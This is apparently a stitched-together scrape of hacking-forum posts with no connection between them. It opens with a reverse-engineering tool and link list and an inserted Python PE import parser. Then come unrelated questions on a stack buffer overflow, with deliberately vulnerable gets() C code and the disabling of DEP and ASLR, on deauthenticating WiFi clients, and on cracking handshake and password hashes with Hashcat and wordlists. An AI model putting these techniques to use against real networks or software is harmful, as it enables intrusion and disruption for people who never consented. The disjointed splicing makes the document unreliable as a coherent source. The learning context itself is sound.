I always see questions on here about good starting resources. So here is a list that I've compiled from my browser bookmarks that I've found helpful in the past, mostly related to old Windows game hacking, so that when I see those questions I can link them back to here.
I kind of assume that you already have some level of programming experience and want to branch into hacking - if you don't then I'd recommend getting the hang of a programming language like C++ first, and especially learning how to use the Win32 API. You can find plenty of help with that elsewhere, so that's not a focus of this post.
If any of these links are not acceptable to post here for whatever reason then let me know and I can edit them out to leave the rest.
Tools
-
it may sound silly, but using Cheat Engine to hack games can teach you a lot of the basic concepts of debugging an executable at a little bit lower level.
-
this is a basic hex editor. You can use it to edit binary files, similar to how you would use a text editor to edit text files. It's split into two columns: a hexadecimal representation and a text representation (which shows what the file would look like interpreted as text).
-
Some tips: HxD also has a built-in memory viewer which you can use to view the memory of a process without needing to attach to it as a debugger, which is quite useful for searching for strings in protected executables that detect when a debugger is attached. You can also use HxD to open very large text files (GBs in size) instantly and without any lag, as long as you don't mind the lack of newlines!
-
-
you'll want to become deeply familiar with the Portable Executable (PE) file format used by Windows EXE and DLL files, and CFF Explorer allows you to poke around, view what the headers look like, and edit them. It even includes some more advanced utilities like an Import Adder, to add DLL imports to an executable.
-
or I mention both because they fill similar roles. They are static analysis tools which can be used to examine a compiled executable to get some guess of what the original source code sort of looked like, without needing to actually run the executable. Ghidra is free/open source and IDA is expensive commercial software, each with their own features and tradeoffs. I see Ghidra being used more and more often but IDA is still definitely holding on.
-
or again, these are similar tools - x64dbg is meant to be a modern successor of sorts, but some hackers still swear by Ollydbg with plugins to iron out some of the bugs on newer Windows versions. These are dynamic analysis tools: you can actually run the code and step through it as it is running to see what it is doing, what values are in memory, in the CPU registers, and so on. Oftentimes both static and dynamic analysis need to be combined to get a fuller picture and you'll need to learn which one is more useful for figuring out the thing you want to know.
-
because x64dbg allows you to see what a program is doing in great detail, it is in the best interest of malware creators to prevent you from using it and exposing how their program works. This is the world of "anti-debug" techniques: methods of discreetly detecting if a debugger is running, and either stopping or changing how the program operates if there is in order to hinder your progress. ScyllaHide attempts to make the debugger stealthier, in order to prevent the debugged program from finding out that you are investigating its inner workings.
-
a classic plugin for Ollydbg that fixes some of its bugs and provides more anti-debugging workarounds. A must-have if you use Ollydbg.
-
a classic executable memory dumper. This is used to turn a currently running process back into an executable file. Why would you want to do this? Well, oftentimes programs will be "packed," meaning that the executable file for them is compressed or encrypted. By running the executable, it will decompress/decrypt itself, and then the process can be dumped in its uncompressed/unencrypted state, allowing you to more easily analyze the code within.
-
Of note: LordPE doesn't work very well on modern Windows versions, since the list of processes caps out at a small number (I think 50), and it only works for 32-bit processes. I don't know of a better modern alternative though - I've tried some, but haven't found one that is reliable for 64-bit processes. Maybe someone in the replies can tell me.
-
-
or import rebuilders. Much like with x64dbg and Ollydbg, Scylla is the modern, open source implementation, and ImpREC is the original classic. Windows programs use DLL libraries in order to interact with the system. For example, the MessageBoxA function in USER32.DLL allows a program to display the built-in Windows message box with an icon and OK/Cancel buttons. Usually, programs have an Import Address Table (or IAT for short) which specifies which imports the program uses. However, a very common trick to make dumping a process (such as with LordPE) difficult is to intentionally forgo the Import Table, instead using the GetProcAddress function to populate a "fake IAT." This means that when the process is dumped, the imports will be random pointers into non-existent memory. Scylla and ImpREC are import rebuilders, which search for such a fake IAT and attempt to build a real IAT from them.
-
allows you to see all the files and registry keys being accessed by a process. You can even right-click on an entry to view the program's call stack when the file or registry key was accessed. This is great if you want a sort of overview or summary of what the process is doing if you don't know where to begin looking.
-
a profiler that can be used on processes even if you do not have symbols for the executable, to see where the most processing time is being spent.
-
allows you to see all HTTP (and HTTPS, with a bit of setup) requests being made by any running program on the current machine, including their headers and contents. Very useful if you want to find out why a program needs to connect online. There is also Wireshark for lower level network stuff (unpopular opinion: it lowkey kind of sucks and I rarely use it).
-
for viewing and replacing executable resources. This tool is not generally useful for changing the behaviour of an executable, only aesthetic things like its icon and text strings, but it can still reveal useful information on occasion.
YouTube
-
great Cheat Engine tutorials. This is how I got started.
-
more Linux focused, but nonetheless essential. I watch every new video from this channel.
-
tutorials for x64dbg and Ollydbg.
-
focused on writing code for hacking Windows games.
-
exploits, network hacking stuff.
-
videogame reverse engineering explained in a simple, easily accessible way. He's also pretty funny.
-
IDA malware reverse engineering and debugger fundamentals, in a livestream format.
-
new, smaller channel, retro game hacking.
-
mostly focused on reversing obfuscated malware VBScript, JavaScript, Python scripts.
Links
-
Tuts4you:
-
Tuts4you Collection 2011:
-
Exetools:
-
Reversing Technology Network:
-
OpenRCE:
-
ARTeam Downloads:
-
PE Format:
-
Peering Inside the PE: A Tour of the Win32 Portable Executable File Format:
-
An In-Depth Look into the Win32 Portable Executable File Format:
-
An In-Depth Look into the Win32 Portable Executable File Format, Part 2:
-
PE.wiki:
-
What implications has the low alignment mode of a PE file:
-
Abusing undocumented features to spoof PE section headers:
-
PE Format Poster:
-
RVA and Import Table:
-
Iczelion Import Table Tutorial:
-
Iczelion Debug API Tutorial:
-
How Windows Debuggers Work:
-
What triggers RIP_EVENT:
-
A Crash Course on the Depths of Win32 Structured Exception Handling:
-
Custom SEH handler with /SAFESEH:
-
The "Ultimate" Anti-Debugging Reference by Peter Ferrie:
-
What Happens Before main():
-
Floating Points, PE headers and libcmt.lib:
-
Enigma Virtual Box:
-
How to find simple stuff:
-
Stephen Chapman Cheat Engine Tutorials:
-
Reversing Wannacry:
-
Anti-Debug Tricks:
-
LOLBAS:
-
Delcert:
-
The faker's guide to reading (x86) assembly language:
-
x86 Assembly Wikibooks:
-
Redundancy of x86 Machine Code:
-
Intel x86 JMP Quick Reference:
-
How To Write Your Own Packer by BigBoote:
-
ActiveMARK on Exetools:
-
ActiveMARK on XeNTaX:
-
Armadillo v3 + Debug Blocker:
-
Armadillo 3.70 with Import Elimination:
-
SafeDiscShim:
-
Themida Unlicense:
-
MagicMida:
-
deroko:
-
Luigi Auriemma:
-
Virtools Deobfuscator:
-
C++ STL Types:
-
Introduction to Reversing C++ Binaries:
-
Dumping Memory:
-
Block Cipher Structures Ranked:
-
Intercept Calls to DirectX with a Proxy DLL:
-
A More Complete DLL Injection Method Using CreateRemoteThread:
-
How to share a data segment in a DLL:
-
RegHide:
-
Smashing The Stack For Fun And Profit:
-
Mr. Exodia:
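As an added example that is not part of the post above or of any tool it lists, here is a minimal PE32 import-table walker in Python: it does the RVA-to-file-offset translation through the section table and then follows IMAGE_IMPORT_DESCRIPTOR and thunk entries, the same structures the PE Format, RVA and Import Table links describe, over a stub image constructed inline (the stub, its section name, and the ordinal value are made up for the example and the stub cannot run). A packed binary that populates a "fake IAT" via GetProcAddress, as described under Scylla/ImpREC, has no import directory and comes back as an empty result here, which is the gap an import rebuilder fills after dumping.

```python
import struct

def build_sample_pe():
    """Constructed PE32 stub (not runnable) with one .idata section importing from USER32.dll."""
    va, raw = 0x1000, 0x200                                    # section RVA and file offset
    idata = bytearray()
    # IMAGE_IMPORT_DESCRIPTOR: OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk
    idata += struct.pack("<5I", va + 0x28, 0, 0, va + 0x40, va + 0x34) + bytes(20)  # + terminator
    idata += struct.pack("<3I", va + 0x4C, 0x80000000 | 7, 0)  # INT: name RVA, ordinal 7, end
    idata += struct.pack("<3I", va + 0x4C, 0x80000000 | 7, 0)  # IAT: identical to the INT on disk
    idata += b"USER32.dll\0\0"                                 # DLL name, padded to 0x4C
    idata += struct.pack("<H", 0) + b"MessageBoxA\0"           # IMAGE_IMPORT_BY_NAME: hint, name
    opt = bytearray(224)                                       # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)                      # Magic = PE32
    struct.pack_into("<I", opt, 92, 16)                        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8, va, 40)               # DataDirectory[1] = import table
    sec = struct.pack("<8sIIII12xI", b".idata", len(idata), va, raw, raw, 0xC0000040)
    hdr = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)        # DOS stub, e_lfanew at 0x3C
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102) + opt + sec
    return hdr.ljust(raw, b"\0") + bytes(idata).ljust(raw, b"\0")

def parse_imports(data):
    """Walk a PE32 import directory and return {dll: [name or 'ordinal#N', ...]}.
    A binary that hides its imports behind GetProcAddress has no directory: empty dict."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]; opt = pe + 24
    if data[pe:pe + 4] != b"PE\0\0" or struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("not a PE32 file (PE32+ is not handled in this example)")
    nsec, opt_size = struct.unpack_from("<H", data, pe + 6)[0], struct.unpack_from("<H", data, pe + 20)[0]
    import_rva = struct.unpack_from("<I", data, opt + 96 + 8)[0]   # DataDirectory[1].VirtualAddress
    sections = [struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i) for i in range(nsec)]
    def rva2off(rva):  # RVA -> file offset through the section table
        for _, vsize, sva, rawsize, rawptr in sections:
            if sva <= rva < sva + max(vsize, rawsize):
                return rva - sva + rawptr
        raise ValueError(f"RVA {rva:#x} is outside every section")
    def cstr(off):
        return data[off:data.index(b"\0", off)].decode("ascii")
    imports = {}
    if import_rva == 0:
        return imports
    desc = rva2off(import_rva)
    while True:
        oft, _, _, name_rva, ft = struct.unpack_from("<5I", data, desc)
        if name_rva == 0:                      # all-zero descriptor ends the array
            break
        funcs, thunk = [], rva2off(oft or ft)  # prefer the INT, fall back to the IAT
        while (entry := struct.unpack_from("<I", data, thunk)[0]) != 0:
            funcs.append(f"ordinal#{entry & 0xFFFF}" if entry & 0x80000000
                         else cstr(rva2off(entry) + 2))        # skip the 2-byte hint
            thunk += 4
        imports[cstr(rva2off(name_rva))] = funcs
        desc += 20
    return imports
```

Running parse_imports over a real 32-bit EXE works the same way; on a PE32+ file the magic check fails because the thunks are 8 bytes wide and the data directories sit 16 bytes further into the optional header.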
Before I begin, I'm not sure if this is the right place to ask this question, so I'll happily accept any better suggestions.
Long story shortened a bit, I have a Samsung tablet that I inherited which I have reason to believe was a retail display model. The model number is SM-T900, for reference. I have been trying to figure out how to connect it to my PC as a drawing tablet to use with Blender, but none of the apps that I've found so far that allow this are supported by the tablet. I found this questionable, as it seems like a pretty decent tablet that should be able to do it; my question is, is there hidden functionality in Samsung's display models that I can somehow unlock, or is this one simply not capable as a drawing tablet? Any information that could help would be greatly appreciated.
Can someone steal card info from physical card payment?
My family member was on holiday a few weeks ago and made a purchase in a local shop to where he was staying. He paid with his debit card and left. And he’s now saying that there’s been £3-5 taken out each day since, and £100 that was blocked by the bank. Surely this isn’t possible? Google didn’t come up with much no matter how I phrased it, just gave results for online stores.
I have reasons to be suspicious about his spending, so just wondering if it’s another cover up.
Edit: this was the UK, no credit card, paid with contactless. We don’t use swipe cards here.
I have an assignment for university and I am trying to experiment with buffer overflow. I have created a vulnerable C program that reads with gets. I am using xdbg. Also, I found in the stack the ebp position and I overflow the buffer with A:\x41+shellcode+\x90:nop until the ebp+4 position, which is the return address of the function, and there I put the address of esp, which points to the top of the stack, which has some A:\x41 and then the shellcode bytes. My problem now is that I receive a C0000005 exception (access violation). I am using Windows 10; I have disabled ASLR and DEP (bcdedit.exe /set nx AlwaysOff) and also used gcc -fno-stack-protector -no-pie. Why is my code not running? Any help?
The code is a dummy; it's this one:
#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: gets() performs no bounds check, so input longer
   than 397 bytes overwrites the saved frame pointer and return address. */
void doit(void) {
    char buf[397];
    gets(buf);
}

int main(void) {
    printf("So... The End...\n");
    doit();
    printf("or... maybe not?\n");
    getchar();
    return 0;
}
Here is the shellcode:
A few weeks ago, I heard that a company was "hacked" because attackers "ransomwared" the entire system. I don't have all the details, but it was quite nasty for the owners, and they had to pay to regain access. I don't fully understand how attackers can get away with it... a friend of mine told me they used cryptocurrencies and VPNs but didn't give me much more detail. Could you clarify this for me? I mean, is it 100% untrackable? How is it done?
Western Europe has them for every public wifi while in Eastern Europe you just connect to the wifi. I have a vague idea they protect against man-in-the-middle attacks but it's just something I read a long time ago.
Have you had any luck with cracking passwords with wordlists?
I have tried several times and wordlists do not work for me. If it's a numerical password it's actually easier for me to bruteforce it, otherwise if it's a mixture of alphanumeric characters I have given up. Tried multiple times - wordlists no luck, and bruteforcing just is not reasonable in the sense that it can take years. The only time I had luck was when I used a mask and set up exactly the type of character and the length of the password, but this is not actually a real world scenario.
How would you go about it if you had to crack a handshake cap file with a mixture of alphanumeric characters?
My router is dual band with the same SSID, meaning it automatically switches to whichever band is best for a device. When using Kismet, I can see two MAC addresses on two channels. However, when scanning with Airgeddon (using the same instance of Kali with the same hardware), only the 2.4GHz MAC is shown.
When testing and running Airgeddon on the visible network, it disconnects all my devices except those on the 5GHz channel. I tried manually running aireplay-ng using the 5GHz MAC as the target, but it tells me it's an invalid address.
Does anyone know the best way to approach this? Would I need 2 wireless NICs? One to run airgeddon on 2.4GHz and one to deauth 5GHz?
I have the hash of a password, I also know the password length is 12 digits, and that it's probably alphanumeric and not random.
What would be the optimal approach/parameters to cracking it with Hashcat?
We are excited to announce the launch of the OffSec KAI (OffSec Knowledge Artificial Intelligence)!
OffSec’s new mentoring and learner support AI bot. OffSec KAI is your own personal OffSec Mentor - designed to help you better understand OffSec’s learning material and “meet you where you are” in your learning journey.
KAI currently draws from the PEN-200 course learning modules (excluding module labs or challenge labs). While KAI has OffSec course knowledge, it is not the ultimate expert. Please remember to use KAI as guidance rather than the absolute truth. KAI is currently accessible to those with an active PEN-200 course via the OffSec Learning Library (OLL).
You can find KAI on the right sidebar within the PEN-200 learning modules. Guide video:
Please note:
-
If you prefer our Student Mentors, you may continue to leverage OffSec Discord or contact .
-
Always remember to avoid sharing personally identifiable information (PII) with KAI.
-
Any OffSec pricing or policies suggested by KAI must be validated by contacting , visiting the Help Center, or referencing the OffSec website.
-
KAI usage is governed by OffSec’s terms and conditions, academic, and privacy policies: .
-
KAI is not allowed during the OSCP exam. KAI will adhere to the OffSec Academic Policy, where hints and guidance on the OSCP exam are not allowed.
As KAI is in its early phase, your feedback is crucial for its continued improvement. Please share your experiences and thoughts on Discord
Let’s make KAI better together!
For more information on OffSec KAI and how it can help you, please visit OffSec KAI FAQ:
Happy Learning!
Hi everyone,
I’m interested in diving into the world of ethical hacking and would love to hear your recommendations for courses that are great for beginners. I’m looking for something that covers the basics and gradually progresses to more advanced topics. Ideally, the course should be well-structured, offer hands-on practice, and be recognized in the industry.
Has anyone taken a course that they found particularly effective? I’m especially interested in courses that provide certification or are endorsed by reputable organizations. Additionally, any tips on the skills I should focus on or resources for practice would be greatly appreciated!
Thanks in advance for your help!
So I made another post a couple days ago about an assignment I have for my ethical hacking class and I made some leeway in that assignment, but after a while I've exhausted all the tools I have at my disposal, at least the ones that I know how to use, and have moved on to another part of my assignment which is steganography. I have an image that supposedly has a hidden message. I've tried using exiftool, strings, DiiT, /stylesuxx.github.io/steganography/, , steghide, stegcracker (I currently have a python script running as I'm trying to brute force the passphrase since we weren't given one), and I just don't know where to go from here. I don't think I'm able to attach the actual image file here (or I'm just too sleep deprived to see it, which is the most likely case). You guys were a massive help with the password cracking and I'd appreciate some more advice on this part of my assignment. Also, in case you're wondering, I've asked my teacher for help multiple times and her answer is always "Google it because that's all I'm going to do", just to give you some sort of idea as to what I'm working with; calling her a teacher is frankly far too generous.